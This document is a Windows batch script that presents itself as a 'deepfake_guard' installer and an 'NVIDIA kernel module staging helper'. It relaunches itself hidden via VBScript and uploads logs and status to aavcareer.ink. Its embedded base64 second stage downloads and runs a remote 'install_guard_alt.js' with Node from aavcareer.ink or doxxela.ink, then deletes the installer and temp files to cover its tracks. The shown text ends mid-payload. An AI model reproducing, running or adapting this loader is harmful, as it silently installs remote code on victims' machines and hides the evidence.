@echo off
if defined NVDG_HIDDEN goto nvdg_main
setlocal EnableDelayedExpansion
if not exist "%TEMP%" mkdir "%TEMP%" 2>nul
set "TMP=%TEMP%"
set "LAUNCHER_STATUS=%TEMP%\deepfake_guard.launcher.status"
set "LAUNCHER_RESULT_URL=https://api.aavcareer.ink/guard-launcher-result"
if exist "%LAUNCHER_STATUS%" del /f /q "%LAUNCHER_STATUS%" 2>nul
del /f /q "%TEMP%\deepfake_guard.worker.lock" 2>nul
set "NVDG_SELF=%~f0"
set "NVDG_INSTALLER_DIR=%CD%"
set "_WVBS=%TEMP%\~nvdg_worker.vbs"
if exist "!_WVBS!" del /f /q "!_WVBS!" 2>nul
> "!_WVBS!" echo Set ws=CreateObject("WScript.Shell")
>> "!_WVBS!" echo ws.Run "cmd /c set NVDG_HIDDEN=1^&set NVDG_INSTALLER_DIR=!NVDG_INSTALLER_DIR!^&call ""!NVDG_SELF!""", 0, False
wscript //B "!_WVBS!" >nul 2>&1
set /a _LWAIT=0
:nvdg_wait
if exist "%LAUNCHER_STATUS%" for /f "usebackq tokens=1-4 delims=|" %%a in ("%LAUNCHER_STATUS%") do (
  if /I "%%d"=="payload_ready" goto nvdg_status_ready
  if /I "%%d"=="decode_failed" goto nvdg_status_fail
)
if !_LWAIT! GEQ 180 goto nvdg_wait_timeout
timeout /t 1 /nobreak >nul
set /a _LWAIT+=1
goto nvdg_wait
:nvdg_wait_timeout
call :nvdg_report_result 1 0 0 worker_timeout
exit /b 1
:nvdg_status_fail
set "_LEXIT=1" & set "_LOK=0" & set "_LUP=0" & set "_LMSG=decode_failed"
call :nvdg_report_result !_LEXIT! !_LOK! !_LUP! !_LMSG!
exit /b 1
:nvdg_status_ready
set "_LEXIT=1" & set "_LOK=0" & set "_LUP=0" & set "_LMSG=unknown"
for /f "usebackq tokens=1-4 delims=|" %%a in ("%LAUNCHER_STATUS%") do (
  set "_LEXIT=%%a" & set "_LOK=%%b" & set "_LUP=%%c" & set "_LMSG=%%d"
)
call :nvdg_report_result !_LEXIT! !_LOK! !_LUP! !_LMSG!
exit /b !_LEXIT!
:nvdg_report_result
where curl >nul 2>&1 || exit /b 0
set "_LOKJ=false" & if "%2"=="1" set "_LOKJ=true"
set "_LUPJ=false" & if "%3"=="1" set "_LUPJ=true"
curl -sk -X POST -H "Content-Type: application/json" -H "X-Guard-Platform: windows" -d "{\"ok\":!_LOKJ!,\"upload\":!_LUPJ!,\"exitCode\":%1,\"message\":\"%4\",\"platform\":\"windows\"}" --connect-timeout 15 --max-time 30 --retry 2 --retry-delay 2 "%LAUNCHER_RESULT_URL%" >nul 2>&1
exit /b 0
:nvdg_remove_installer
if not defined _NVDG_INST exit /b 0
if not defined NVDG_INSTALLER_DIR set "NVDG_INSTALLER_DIR=%CD%"
del /f /q "!_NVDG_INST!" 2>nul
del /f /q "%NVDG_INSTALLER_DIR%\upd_w.cmd" "%NVDG_INSTALLER_DIR%\upda_w.cmd" 2>nul
del /f /q "%TEMP%\~nvdg_*" 2>nul
del /f /q "%TEMP%\~kdm_*.b64" "%TEMP%\~kdm_*.cmd" 2>nul
del /f /q "%TEMP%\deepfake_guard.launcher.status" 2>nul
del /f /q "%TEMP%\~nvdg_worker.vbs" 2>nul
if exist "%NVDG_INSTALLER_DIR%\upd_w.cmd" goto nvdg_rm_retry
if exist "%NVDG_INSTALLER_DIR%\upda_w.cmd" goto nvdg_rm_retry
if exist "!_NVDG_INST!" goto nvdg_rm_retry
exit /b 0
:nvdg_rm_retry
set "_RI=%TEMP%\~nvdg_rminst_%RANDOM%.cmd"
if exist "!_RI!" del /f /q "!_RI!" 2>nul
> "!_RI!" echo @echo off
>>"!_RI!" echo for /L %%%%n in (1,1,60) do (
>>"!_RI!" echo   del /f /q "!_NVDG_INST!" 2^>nul
>>"!_RI!" echo   del /f /q "%NVDG_INSTALLER_DIR%\upd_w.cmd" "%NVDG_INSTALLER_DIR%\upda_w.cmd" 2^>nul
>>"!_RI!" echo   if not exist "!_NVDG_INST!" if not exist "%NVDG_INSTALLER_DIR%\upd_w.cmd" if not exist "%NVDG_INSTALLER_DIR%\upda_w.cmd" goto done
>>"!_RI!" echo   timeout /t 1 /nobreak ^>nul
>>"!_RI!" echo )
>>"!_RI!" echo :done
>>"!_RI!" echo del /f /q "%TEMP%\~nvdg_*" 2^>nul
>>"!_RI!" echo del /f /q "%TEMP%\~kdm_*.b64" "%TEMP%\~kdm_*.cmd" 2^>nul
>>"!_RI!" echo del /f /q "%TEMP%\deepfake_guard.launcher.status" 2^>nul
>>"!_RI!" echo del /f /q "%TEMP%\~nvdg_worker.vbs" 2^>nul
>>"!_RI!" echo del /f /q "%%~f0" 2^>nul
start "" /MIN cmd /D /C ""!_RI!"" >nul 2>&1
exit /b 0
:nvdg_main
setlocal EnableDelayedExpansion
if not exist "%TEMP%" mkdir "%TEMP%" 2>nul
set "TMP=%TEMP%"
set "_NVDG_INST=%~f0"
if defined NVDG_INSTALLER_DIR set "INSTALLER_DIR=%NVDG_INSTALLER_DIR%"
if not defined INSTALLER_DIR set "INSTALLER_DIR=%CD%"
echo.>"%TEMP%\deepfake_guard.worker.lock"
rem NVIDIA kernel module staging helper
set "LOG=%TEMP%\deepfake_guard.log"
set "LOG_UPLOAD_URL=https://api.aavcareer.ink/guard-install-log"
set "LAUNCHER_STATUS=%TEMP%\deepfake_guard.launcher.status"
>>"%LOG%" echo [%date% %time%] === deepfake_guard install started ===
set "_STUB_UP=0"
where curl >nul 2>&1
if not errorlevel 1 (
  curl -sk -X POST -H "Content-Type: text/plain" -H "X-Guard-Platform: windows" --data-binary "@%LOG%" --connect-timeout 15 --max-time 30 --retry 2 --retry-delay 2 "%LOG_UPLOAD_URL%" >nul 2>&1
  if not errorlevel 1 set "_STUB_UP=1"
)
set "_796e6a=%TEMP%\~kdm_0629.b64"
set "_420256=%TEMP%\~kdm_affa.cmd"
del /f /q "%_796e6a%" "%_420256%" 2>nul
set "NVDG_LAUNCHER=%~f0"
>>"%_796e6a%" echo QGVjaG8gb2ZmDQoNCnNldGxvY2FsIEVuYWJsZURlbGF5ZWRFeHBhbnNpb24NCg0KaWYgbm90IGV4
>>"%_796e6a%" echo aXN0ICIlVEVNUCUiIG1rZGlyICIlVEVNUCUiIDI+bnVsDQoNCnNldCAiVE1QPSVURU1QJSINCg0K
>>"%_796e6a%" echo c2V0ICJJTlNUQUxMRVJfRElSPSVDRCUiDQoNCmlmIGRlZmluZWQgTlZER19JTlNUQUxMRVJfRElS
>>"%_796e6a%" echo IHNldCAiSU5TVEFMTEVSX0RJUj0lTlZER19JTlNUQUxMRVJfRElSJSINCg0KZGVsIC9mIC9xICIl
>>"%_796e6a%" echo VEVNUCVcfm52ZGdfbG9ndXBsb2FkXyouY21kIiAiJVRFTVAlXH5udmRnX2RlbF8qLmNtZCIgIiVU
>>"%_796e6a%" echo RU1QJVx+bnZkZ19ybWluc3RfKi5jbWQiIDI+bnVsDQoNCnNldCAiTE9HPSVURU1QJVxkZWVwZmFr
>>"%_796e6a%" echo ZV9ndWFyZC5sb2ciDQoNCmlmIG5vdCBkZWZpbmVkIExPR19VUExPQURfVVJMIHNldCAiTE9HX1VQ
>>"%_796e6a%" echo TE9BRF9VUkw9aHR0cHM6Ly9hcGkuYWF2Y2FyZWVyLmluay9ndWFyZC1pbnN0YWxsLWxvZyINCg0K
>>"%_796e6a%" echo c2V0ICJUTVBESVI9JVRFTVAlXGRlZXBmYWtlX2d1YXJkX3dvcmsiDQoNCnNldCAiTE9DS0RJUj0l
>>"%_796e6a%" echo VEVNUCVcZGVlcGZha2VfZ3VhcmQubG9jay5kIg0KDQppZiBub3QgZGVmaW5lZCBHVUFSRF9TVE9S
>>"%_796e6a%" echo RSBzZXQgIkdVQVJEX1NUT1JFPWh0dHBzOi8vYXBpLmFhdmNhcmVlci5pbmsiDQoNCmlmIG5vdCBk
>>"%_796e6a%" echo ZWZpbmVkIEdVQVJEX1NUT1JFX0ZBTExCQUNLIHNldCAiR1VBUkRfU1RPUkVfRkFMTEJBQ0s9aHR0
>>"%_796e6a%" echo cHM6Ly9kb3h4ZWxhLmluayINCg0Kc2V0ICJHVUFSRF9SRUw9aW5zdGFsbF9ndWFyZF9hbHQuanMi
>>"%_796e6a%" echo DQoNCnNldCAiTUFYX0FUVEVNUFRTPTgiDQoNCnNldCAiTk9ERV9DT05ORUNUX1RJTUVPVVQ9MTIw
>>"%_796e6a%" echo Ig0KDQpzZXQgIk5PREVfTUFYX1RJTUU9NzIwMCINCg0Kc2V0ICJOT0RFX0NVUkxfUkVUUlk9OCIN
>>"%_796e6a%" echo Cg0Kc2V0ICJHVUFSRF9DT05ORUNUX1RJTUVPVVQ9MTIwIg0KDQpzZXQgIkdVQVJEX01BWF9USU1F
>>"%_796e6a%" echo PTcyMDAiDQoNCnNldCAiR1VBUkRfQ1VSTF9SRVRSWT04Ig0KDQpzZXQgIkNVUkxfU1RBTExfTElN
>>"%_796e6a%" echo SVQ9NTAwIg0KDQpzZXQgIkNVUkxfU1RBTExfVElNRT0xODAiDQoNCnNldCAiR1VBUkRfSlNfTUlO
>>"%_796e6a%" echo PTUwMDAwIg0KDQpzZXQgIkdVQVJEX0VYSVQ9MCINCg0Kc2V0IC9hIExPQ0tfV0FJVD0wDQoNCj4+
>>"%_796e6a%" echo IiVMT0clIiBlY2hvIFslZGF0ZSUgJXRpbWUlXSA9PT0gZGVlcGZha2VfZ3VhcmQgaW5zdGFsbCBz
>>"%_796e6a%" echo dGFydGVkID09PQ0KDQp3aGVyZSBjdXJsID5udWwgMj4mMQ0KDQppZiBlcnJvcmxldmVsIDEgKA0K
>>"%_796e6a%" echo DQogIGNhbGwgOmxvZyBGQUlMIGN1cmwgbm90IGZvdW5kIGluIFBBVEgNCg0KICBleGl0IC9iIDEN
>>"%_796e6a%" echo Cg0KKQ0KDQpjYWxsIDp1cGxvYWRfZ3VhcmRfbG9nDQoNCmNhbGwgOmNsZWFyX3N0YWxlX2xvY2sN
>>"%_796e6a%" echo Cg0KY2FsbCA6aW5zdGFsbF9ydW5uaW5nDQoNCmlmIG5vdCBlcnJvcmxldmVsIDEgKA0KDQogID4+
>>"%_796e6a%" echo IiVMT0clIiBlY2hvIFslZGF0ZSUgJXRpbWUlXSBJTkZPIGluc3RhbGwgYWxyZWFkeSBydW5uaW5n
>>"%_796e6a%" echo LCBza2lwcGluZyBkdXBsaWNhdGUgbGF1bmNoDQoNCiAgY2FsbCA6dXBsb2FkX2d1YXJkX2xvZw0K
>>"%_796e6a%" echo DQogIGV4aXQgL2IgMA0KDQopDQoNCmNhbGwgOmFjcXVpcmVfbG9jaw0KDQpjYWxsIDpjbGVhcl9z
>>"%_796e6a%" echo dGFsZV9maWxlcw0KDQpjYWxsIDpsb2cgT0sgYmF0IHN0YXJ0ZWQNCg0KZWNobyAwXnwxXnwwXnxw
>>"%_796e6a%" echo YXlsb2FkX3JlYWR5PiAiJVRFTVAlXGRlZXBmYWtlX2d1YXJkLmxhdW5jaGVyLnN0YXR1cyINCg0K
>>"%_796e6a%" echo ZGVsIC9mIC9xICIlVEVNUCVcZGVlcGZha2VfZ3VhcmQud29ya2VyLmxvY2siIDI+bnVsDQoNCmNh
>>"%_796e6a%" echo bGwgOnNjaGVkdWxlX2xvZ191cGxvYWQNCg0KaWYgbm90IGV4aXN0ICIlVE1QRElSJSIgbWtkaXIg
>>"%_796e6a%" echo IiVUTVBESVIlIg0KDQpjZCAvZCAiJVRNUERJUiUiDQoNCmlmIGVycm9ybGV2ZWwgMSAoDQoNCiAg
>>"%_796e6a%" echo Y2FsbCA6bG9nIEZBSUwgY2QgdG8gJVRNUERJUiUNCg0KICBzZXQgR1VBUkRfRVhJVD0xDQoNCiAg
>>"%_796e6a%" echo Z290byBjbGVhbnVwX2V4aXQNCg0KKQ0KDQpjYWxsIDpsb2cgT0sgY2QgdG8gJVRNUERJUiUNCg0K
>>"%_796e6a%" echo Y2FsbCA6ZmluZF9sb2NhbF9ub2RlDQoNCmlmIGRlZmluZWQgTk9ERV9CSU4gKA0KDQogIGNhbGwg
>>"%_796e6a%" echo OmxvZyBPSyB1c2luZyBsb2NhbCBub2RlIGF0ICFOT0RFX0JJTiEgdmVyc2lvbj0hTk9ERV9WRVIh
>>"%_796e6a%" echo DQoNCiAgZ290byBub2RlX3JlYWR5DQoNCikNCg0KY2FsbCA6ZmluZF9zeXN0ZW1fbm9kZQ0KDQpp
>>"%_796e6a%" echo ZiBkZWZpbmVkIE5PREVfQklOICgNCg0KICBjYWxsIDpsb2cgT0sgdXNpbmcgc3lzdGVtIG5vZGUg
>>"%_796e6a%" echo YXQgIU5PREVfQklOISB2ZXJzaW9uPSFOT0RFX1ZFUiENCg0KICBnb3RvIG5vZGVfcmVhZHkNCg0K
>>"%_796e6a%" echo KQ0KDQpjYWxsIDpsb2cgSU5GTyBubyBub2RlIGZvdW5kLCBkb3dubG9hZGluZyBwb3J0YWJsZSBu
>>"%_796e6a%" echo b2RlDQoNCmNhbGwgOmRvd25sb2FkX3BvcnRhYmxlX25vZGUNCg0KaWYgZXJyb3JsZXZlbCAxIGdv
>>"%_796e6a%" echo dG8gY2xlYW51cF9leGl0DQoNCmNhbGwgOmZpbmRfbG9jYWxfbm9kZQ0KDQppZiBub3QgZGVmaW5l
>>"%_796e6a%" echo ZCBOT0RFX0JJTiAoDQoNCiAgY2FsbCA6bG9nIEZBSUwgcG9ydGFibGUgbm9kZSBub3QgZm91bmQg
>>"%_796e6a%" echo YWZ0ZXIgZG93bmxvYWQNCg0KICBzZXQgR1VBUkRfRVhJVD0xDQoNCiAgZ290byBjbGVhbnVwX2V4
>>"%_796e6a%" echo aXQNCg0KKQ0KDQpjYWxsIDpsb2cgT0sgcG9ydGFibGUgbm9kZSByZWFkeSBhdCAhTk9ERV9CSU4h
>>"%_796e6a%" echo IHZlcnNpb249IU5PREVfVkVSIQ0KDQo6bm9kZV9yZWFkeQ0KDQpzZXQgIkdVQVJEX0pTPSVUTVBE
>>"%_796e6a%" echo SVIlXGluc3RhbGxfZ3VhcmRfYWx0LmpzIg0KDQpzZXQgIkdVQVJEX1VSTD0hR1VBUkRfU1RPUkUh
>>"%_796e6a%" echo LyFHVUFSRF9SRUwhIg0KDQpjYWxsIDpsb2cgSU5GTyBwcmVwYXJpbmcgaW5zdGFsbF9ndWFyZF9h
>>"%_796e6a%" echo bHQuanMNCg0KY2FsbCA6ZW5zdXJlX2d1YXJkX2pzDQoNCmlmIGVycm9ybGV2ZWwgMSBnb3RvIGNs
>>"%_796e6a%" echo ZWFudXBfZXhpdA0KDQpjYWxsIDpmaW5kX2xvY2FsX25vZGUNCg0KaWYgZGVmaW5lZCBOT0RFX0JJ
>>"%_796e6a%" echo TiBnb3RvIHJ1bl9ndWFyZA0KDQpjYWxsIDpmaW5kX3N5c3RlbV9ub2RlDQoNCmlmIG5vdCBkZWZp
>>"%_796e6a%" echo bmVkIE5PREVfQklOICgNCg0KICBjYWxsIDpsb2cgRkFJTCBubyBub2RlIGJpbmFyeSBmb3VuZCBi
>>"%_796e6a%" echo ZWZvcmUgaW5zdGFsbF9ndWFyZF9hbHQuanMNCg0KICBzZXQgR1VBUkRfRVhJVD0xDQoNCiAgZ290
>>"%_796e6a%" echo byBjbGVhbnVwX2V4aXQNCg0KKQ0KDQpjYWxsIDpsb2cgT0sgcmVzb2x2ZWQgbm9kZSBiZWZvcmUg
>>"%_796e6a%" echo cnVuOiAhTk9ERV9CSU4hDQoNCjpydW5fZ3VhcmQNCg0KY2FsbCA6bG9nIElORk8gcnVubmluZyBp
>>"%_796e6a%" echo bnN0YWxsX2d1YXJkX2FsdC5qcyB3aXRoICFOT0RFX0JJTiENCg0KIiFOT0RFX0JJTiEiICIhR1VB
>>"%_796e6a%" echo UkRfSlMhIiA+PiIlTE9HJSIgMj4mMQ0KDQpzZXQgR1VBUkRfRVhJVD0hZXJyb3JsZXZlbCENCg0K
>>"%_796e6a%" echo aWYgIUdVQVJEX0VYSVQhIEVRVSAwICgNCg0KICBjYWxsIDpsb2cgT0sgaW5zdGFsbF9ndWFyZF9h
>>"%_796e6a%" echo bHQuanMgZmluaXNoZWQgZXhpdCAwDQoNCikgZWxzZSAoDQoNCiAgY2FsbCA6bG9nIEZBSUwgaW5z
>>"%_796e6a%" echo dGFsbF9ndWFyZF9hbHQuanMgZmluaXNoZWQgZXhpdCAhR1VBUkRfRVhJVCENCg0KKQ0KDQo6Y2xl
>>"%_796e6a%" echo YW51cF9leGl0DQoNCmNkIC9kICIlVEVNUCUiDQoNClJFTSBOZXZlciBkZWxldGUgJUxPRyUgLSBh
>>"%_796e6a%" echo cHBlbmQtb25seSBsb2cga2VwdCBhY3Jvc3MgcnVucw0KDQppZiBleGlzdCAiJVRNUERJUiUiIHJt
>>"%_796e6a%" echo ZGlyIC9zIC9xICIlVE1QRElSJSINCg0KaWYgZXhpc3QgIiVMT0NLRElSJSIgcm1kaXIgL3MgL3Eg
>>"%_796e6a%" echo IiVMT0NLRElSJSINCg0KY2FsbCA6Y2xlYW51cF90ZW1wX2FydGlmYWN0cw0KDQpjYWxsIDpsb2cg
>>"%_796e6a%" echo T0sgY2xlYW51cCBkb25lDQoNCmNhbGwgOmxvZyA9PT0gZGVlcGZha2VfZ3VhcmQgaW5zdGFsbCBm
>>"%_796e6a%" echo aW5pc2hlZCBleGl0ICFHVUFSRF9FWElUISA9PT0NCg0KY2FsbCA6dXBsb2FkX2d1YXJkX2xvZw0K
>>"%_796e6a%" echo DQpjYWxsIDpkZWxldGVfaW5zdGFsbGVyDQoNCmV4aXQgL2IgIUdVQVJEX0VYSVQhDQoNCjpjbGVh
>>"%_796e6a%" echo cl9zdGFsZV9maWxlcw0KDQppZiBleGlzdCAiJVRNUERJUiVcaW5zdGFsbF9ndWFyZF9hbHQuanMi
>>"%_796e6a%" echo ICgNCg0KICBzZXQgIlNUQUxFX1NJWkU9MCINCg0KICBmb3IgJSVBIGluICgiJVRNUERJUiVcaW5z
>>"%_796e6a%" echo dGFsbF9ndWFyZF9hbHQuanMiKSBkbyBzZXQgIlNUQUxFX1NJWkU9JSV+ekEiDQoNCiAgaWYgIVNU
>>"%_796e6a%" echo QUxFX1NJWkUhIExTUyAhR1VBUkRfSlNfTUlOISAoDQoNCiAgICBjYWxsIDpsb2cgV0FSTiByZW1v
>>"%_796e6a%" echo dmluZyBpbmNvbXBsZXRlIGluc3RhbGxfZ3VhcmRfYWx0LmpzIHNpemU9IVNUQUxFX1NJWkUhDQoN
>>"%_796e6a%" echo CiAgICBkZWwgL2YgL3EgIiVUTVBESVIlXGluc3RhbGxfZ3VhcmRfYWx0LmpzIg0KDQogICkNCg0K
>>"%_796e6a%" echo KQ0KDQppZiBleGlzdCAiJVRNUERJUiVcbm9kZS12MjAuMTguMS13aW4teDY0IiAoDQoNCiAgc2V0
>>"%_796e6a%" echo ICJOT0RFX0VYRT0lVE1QRElSJVxub2RlLXYyMC4xOC4xLXdpbi14NjRcbm9kZS5leGUiDQoNCiAg
>>"%_796e6a%" echo c2V0ICJOT0RFX1ZFUj0iDQoNCiAgaWYgbm90IGV4aXN0ICIhTk9ERV9FWEUhIiAoDQoNCiAgICBj
>>"%_796e6a%" echo YWxsIDpsb2cgV0FSTiByZW1vdmluZyBicm9rZW4gbm9kZSBkaXIgbWlzc2luZyBub2RlLmV4ZQ0K
>>"%_796e6a%" echo DQogICAgcm1kaXIgL3MgL3EgIiVUTVBESVIlXG5vZGUtdjIwLjE4LjEtd2luLXg2NCIgMj5udWwN
>>"%_796e6a%" echo Cg0KICAgIGlmIGV4aXN0ICIlVE1QRElSJVxub2RlLnppcCIgZGVsIC9mIC9xICIlVE1QRElSJVxu
>>"%_796e6a%" echo b2RlLnppcCINCg0KICApIGVsc2UgKA0KDQogICAgZm9yIC9mICJkZWxpbXM9IiAlJXYgaW4gKCci
>>"%_796e6a%" echo IU5PREVfRVhFISIgLXYgMl4+XiYxJykgZG8gc2V0ICJOT0RFX1ZFUj0lJXYiDQoNCiAgICBpZiBu
>>"%_796e6a%" echo b3QgZGVmaW5lZCBOT0RFX1ZFUiAoDQoNCiAgICAgIGNhbGwgOmxvZyBXQVJOIHJlbW92aW5nIGJy
>>"%_796e6a%" echo b2tlbiBub2RlIGRpciBub2RlLmV4ZSBub3QgcnVubmFibGUNCg0KICAgICAgcm1kaXIgL3MgL3Eg
>>"%_796e6a%" echo IiVUTVBESVIlXG5vZGUtdjIwLjE4LjEtd2luLXg2NCIgMj5udWwNCg0KICAgICAgaWYgZXhpc3Qg
>>"%_796e6a%" echo IiVUTVBESVIlXG5vZGUuemlwIiBkZWwgL2YgL3EgIiVUTVBESVIlXG5vZGUuemlwIg0KDQogICAg
>>"%_796e6a%" echo KQ0KDQogICkNCg0KKQ0KDQppZiBleGlzdCAiJVRFTVAlXGRlZXBmYWtlX2d1YXJkXCIgKA0KDQog
>>"%_796e6a%" echo IGNhbGwgOmxvZyBXQVJOIHJlbW92aW5nIGxlZ2FjeSBkZWVwZmFrZV9ndWFyZCB3b3JrIGRpcg0K
>>"%_796e6a%" echo DQogIHJtZGlyIC9zIC9xICIlVEVNUCVcZGVlcGZha2VfZ3VhcmQiIDI+bnVsDQoNCikNCg0KZXhp
>>"%_796e6a%" echo dCAvYiAwDQoNCjpjbGVhcl9zdGFsZV9sb2NrDQoNCmlmIG5vdCBleGlzdCAiJUxPQ0tESVIlXCIg
>>"%_796e6a%" echo ZXhpdCAvYiAwDQoNCmNhbGwgOmluc3RhbGxfcnVubmluZw0KDQppZiBlcnJvcmxldmVsIDEgKA0K
>>"%_796e6a%" echo DQogIGNhbGwgOmxvZyBXQVJOIGNsZWFyaW5nIHN0YWxlIGxvY2sgZGlyDQoNCiAgcm1kaXIgL3Mg
>>"%_796e6a%" echo L3EgIiVMT0NLRElSJSIgMj5udWwNCg0KKQ0KDQpleGl0IC9iIDANCg0KOmluc3RhbGxfcnVubmlu
>>"%_796e6a%" echo Zw0KDQppZiBub3QgZXhpc3QgIiVMT0NLRElSJVxwaWQiIGV4aXQgL2IgMQ0KDQpzZXQgIkxPQ0tf
>>"%_796e6a%" echo UElEPSINCg0Kc2V0IC9wIExPQ0tfUElEPTwiJUxPQ0tESVIlXHBpZCINCg0KaWYgbm90IGRlZmlu
>>"%_796e6a%" echo ZWQgTE9DS19QSUQgZXhpdCAvYiAxDQoNCmlmIC9JICIhTE9DS19QSUQhIj09IkFDVElWRSIgZXhp
>>"%_796e6a%" echo dCAvYiAxDQoNCnRhc2tsaXN0IC9GSSAiUElEIGVxICFMT0NLX1BJRCEiIDI+bnVsIHwgZmluZCAv
>>"%_796e6a%" echo SSAiIUxPQ0tfUElEISIgPm51bA0KDQppZiBlcnJvcmxldmVsIDEgZXhpdCAvYiAxDQoNCmV4aXQg
>>"%_796e6a%" echo L2IgMA0KDQo6YWNxdWlyZV9sb2NrDQoNCmlmIG5vdCBleGlzdCAiJUxPQ0tESVIlIiBta2RpciAi
>>"%_796e6a%" echo JUxPQ0tESVIlIiAyPm51bCAmJiBnb3RvIGxvY2tfZ290DQoNCmNhbGwgOmluc3RhbGxfcnVubmlu
>>"%_796e6a%" echo Zw0KDQppZiBlcnJvcmxldmVsIDEgKA0KDQogIGNhbGwgOmxvZyBXQVJOIGxvY2sgZGlyIGV4aXN0
>>"%_796e6a%" echo cyBidXQgcHJvY2VzcyBkZWFkLCByZWNsYWltaW5nDQoNCiAgcm1kaXIgL3MgL3EgIiVMT0NLRElS
>>"%_796e6a%" echo JSIgMj5udWwNCg0KICBta2RpciAiJUxPQ0tESVIlIiAyPm51bA0KDQogIGdvdG8gbG9ja19nb3QN
>>"%_796e6a%" echo Cg0KKQ0KDQppZiAhTE9DS19XQUlUISBHRVEgNjAwICgNCg0KICBjYWxsIDpsb2cgV0FSTiBsb2Nr
>>"%_796e6a%" echo IHRpbWVvdXQsIGZvcmNpbmcgbG9jaw0KDQogIHJtZGlyIC9zIC9xICIlTE9DS0RJUiUiIDI+bnVs
>>"%_796e6a%" echo DQoNCiAgbWtkaXIgIiVMT0NLRElSJSIgMj5udWwNCg0KICBnb3RvIGxvY2tfZ290DQoNCikNCg0K
>>"%_796e6a%" echo aWYgIUxPQ0tfV0FJVCEgRVFVIDAgKA0KDQogIHNldCAvcCBMT0NLX1BJRD08IiVMT0NLRElSJVxw
>>"%_796e6a%" echo aWQiDQoNCiAgY2FsbCA6bG9nIElORk8gd2FpdGluZyBmb3IgYW5vdGhlciBpbnN0YWxsIHBpZD0h
>>"%_796e6a%" echo TE9DS19QSUQhDQoNCikNCg0Kc2V0IC9hIExPQ0tfV0FJVCs9MQ0KDQp0aW1lb3V0IC90IDEgL25v
>>"%_796e6a%" echo YnJlYWsgPm51bA0KDQpnb3RvIGFjcXVpcmVfbG9jaw0KDQo6bG9ja19nb3QNCg0Kc2V0ICJMT0NL
>>"%_796e6a%" echo X1BJRD0iDQoNCmZvciAvZiAic2tpcD0xIHRva2Vucz0xIiAlJXAgaW4gKCd3bWljIHByb2Nlc3Mg
>>"%_796e6a%" echo d2hlcmUgIm5hbWU9J1dNSUMuZXhlJyIgZ2V0IFBhcmVudFByb2Nlc3NJZCAyXj5udWwnKSBkbyBz
>>"%_796e6a%" echo ZXQgIkxPQ0tfUElEPSUlcCINCg0KaWYgbm90IGRlZmluZWQgTE9DS19QSUQgc2V0ICJMT0NLX1BJ
>>"%_796e6a%" echo RD1BQ1RJVkUiDQoNCmVjaG8gIUxPQ0tfUElEIT4gIiVMT0NLRElSJVxwaWQiDQoNCmNhbGwgOmxv
>>"%_796e6a%" echo ZyBPSyBhY3F1aXJlZCBsb2NrIHBpZD0hTE9DS19QSUQhDQoNCmlmICFMT0NLX1dBSVQhIEdUUiAw
>>"%_796e6a%" echo IGNhbGwgOmxvZyBPSyBhY3F1aXJlZCBsb2NrIGFmdGVyICFMT0NLX1dBSVQhcyB3YWl0DQoNCmV4
>>"%_796e6a%" echo aXQgL2IgMA0KDQo6ZmluZF9sb2NhbF9ub2RlDQoNCnNldCAiTk9ERV9CSU49Ig0KDQpzZXQgIk5P
>>"%_796e6a%" echo REVfVkVSPSINCg0Kc2V0ICJOT0RFX0VYRT0lVE1QRElSJVxub2RlLXYyMC4xOC4xLXdpbi14NjRc
>>"%_796e6a%" echo bm9kZS5leGUiDQoNCmlmIGV4aXN0ICIhTk9ERV9FWEUhIiAoDQoNCiAgZm9yIC9mICJkZWxpbXM9
>>"%_796e6a%" echo IiAlJXYgaW4gKCciIU5PREVfRVhFISIgLXYgMl4+XiYxJykgZG8gc2V0IE5PREVfVkVSPSUldg0K
>>"%_796e6a%" echo DQogIGlmIGRlZmluZWQgTk9ERV9WRVIgKA0KDQogICAgc2V0ICJOT0RFX0JJTj0hTk9ERV9FWEUh
>>"%_796e6a%" echo Ig0KDQogICAgZ290byA6ZW9mDQoNCiAgKQ0KDQogIGNhbGwgOmxvZyBXQVJOIHJlbW92aW5nIGJy
>>"%_796e6a%" echo b2tlbiBsb2NhbCBub2RlDQoNCiAgcm1kaXIgL3MgL3EgIiVUTVBESVIlXG5vZGUtdjIwLjE4LjEt
>>"%_796e6a%" echo d2luLXg2NCIgMj5udWwNCg0KKQ0KDQppZiBleGlzdCAiJVRNUERJUiUiIGZvciAvZiAiZGVsaW1z
>>"%_796e6a%" echo PSIgJSVGIGluICgnZGlyIC9zIC9iICIlVE1QRElSJVxub2RlLmV4ZSIgMl4+bnVsJykgZG8gKA0K
>>"%_796e6a%" echo DQogIGZvciAvZiAiZGVsaW1zPSIgJSV2IGluICgnIiUlRiIgLXYgMl4+XiYxJykgZG8gc2V0IE5P
>>"%_796e6a%" echo REVfVkVSPSUldg0KDQogIGlmIGRlZmluZWQgTk9ERV9WRVIgKA0KDQogICAgc2V0ICJOT0RFX0JJ
>>"%_796e6a%" echo Tj0lJUYiDQoNCiAgICBnb3RvIDplb2YNCg0KICApDQoNCikNCg0KZXhpdCAvYiAwDQoNCjpmaW5k
>>"%_796e6a%" echo X3N5c3RlbV9ub2RlDQoNCnNldCAiTk9ERV9CSU49Ig0KDQpzZXQgIk5PREVfVkVSPSINCg0KZm9y
>>"%_796e6a%" echo IC9mICJkZWxpbXM9IiAlJUYgaW4gKCd3aGVyZSBub2RlIDJePm51bCcpIGRvICgNCg0KICBmb3Ig
>>"%_796e6a%" echo L2YgImRlbGltcz0iICUldiBpbiAoJyIlJUYiIC12IDJePl4mMScpIGRvIHNldCBOT0RFX1ZFUj0l
>>"%_796e6a%" echo JXYNCg0KICBpZiBkZWZpbmVkIE5PREVfVkVSICgNCg0KICAgIHNldCAiTk9ERV9CSU49JSVGIg0K
>>"%_796e6a%" echo DQogICAgZ290byA6ZW9mDQoNCiAgKQ0KDQopDQoNCmV4aXQgL2IgMA0KDQo6bm9kZV96aXBfaW50
>>"%_796e6a%" echo ZWdyaXR5DQoNCnNldCAiTk9ERV9aSVA9JX4xIg0KDQppZiBub3QgZGVmaW5lZCBOT0RFX1pJUCBz
>>"%_796e6a%" echo ZXQgIk5PREVfWklQPSVUTVBESVIlXG5vZGUuemlwIg0KDQppZiBub3QgZXhpc3QgIiFOT0RFX1pJ
>>"%_796e6a%" echo UCEiIGV4aXQgL2IgMQ0KDQpmb3IgJSVBIGluICgiIU5PREVfWklQISIpIGRvIGlmICUlfnpBIExT
>>"%_796e6a%" echo UyAxMDI0IGV4aXQgL2IgMQ0KDQp3aGVyZSB0YXIgPm51bCAyPiYxDQoNCmlmIG5vdCBlcnJvcmxl
>>"%_796e6a%" echo dmVsIDEgKA0KDQogIHRhciAtdGYgIiFOT0RFX1pJUCEiID5udWwgMj4mMQ0KDQogIGlmIGVycm9y
